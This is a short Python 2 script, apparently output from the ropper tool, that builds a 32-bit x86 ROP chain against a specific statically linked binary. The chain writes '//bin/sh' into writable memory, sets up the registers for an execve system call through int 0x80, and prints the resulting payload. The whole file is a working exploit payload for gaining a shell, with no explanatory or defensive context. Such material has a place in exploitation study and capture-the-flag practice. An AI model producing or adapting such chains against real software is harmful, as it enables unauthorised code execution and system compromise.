#!/usr/bin/env python
# Generated by ropper ropchain generator #
from struct import pack

p = lambda x : pack('I', x)

IMAGE_BASE_0 = 0x08048000 # 9b512798dde5278069d892c4f465d82e29c1b28260b84657533af664d7dbc00a
rebase_0 = lambda x : p(x + IMAGE_BASE_0)

rop = ''

rop += rebase_0(0x0001434b) # 0x0805c34b: pop eax; ret; 
rop += '//bi'
rop += rebase_0(0x000281aa) # 0x080701aa: pop edx; ret; 
rop += rebase_0(0x000a4060)
rop += rebase_0(0x0005330d) # 0x0809b30d: mov dword ptr [edx], eax; ret; 
rop += rebase_0(0x0001434b) # 0x0805c34b: pop eax; ret; 
rop += 'n/sh'
rop += rebase_0(0x000281aa) # 0x080701aa: pop edx; ret; 
rop += rebase_0(0x000a4064)
rop += rebase_0(0x0005330d) # 0x0809b30d: mov dword ptr [edx], eax; ret; 
rop += rebase_0(0x0001434b) # 0x0805c34b: pop eax; ret; 
rop += p(0x00000000)
rop += rebase_0(0x000281aa) # 0x080701aa: pop edx; ret; 
rop += rebase_0(0x000a4068)
rop += rebase_0(0x0005330d) # 0x0809b30d: mov dword ptr [edx], eax; ret; 
rop += rebase_0(0x000001d1) # 0x080481d1: pop ebx; ret; 
rop += rebase_0(0x000a4060)
rop += rebase_0(0x000a07d0) # 0x080e87d0: pop ecx; push cs; or al, 0x41; ret; 
rop += rebase_0(0x000a4068)
rop += rebase_0(0x000281aa) # 0x080701aa: pop edx; ret; 
rop += rebase_0(0x000a4068)
rop += rebase_0(0x0001434b) # 0x0805c34b: pop eax; ret; 
rop += p(0x0000000b)
rop += rebase_0(0x00028880) # 0x08070880: int 0x80; ret; 
print rop

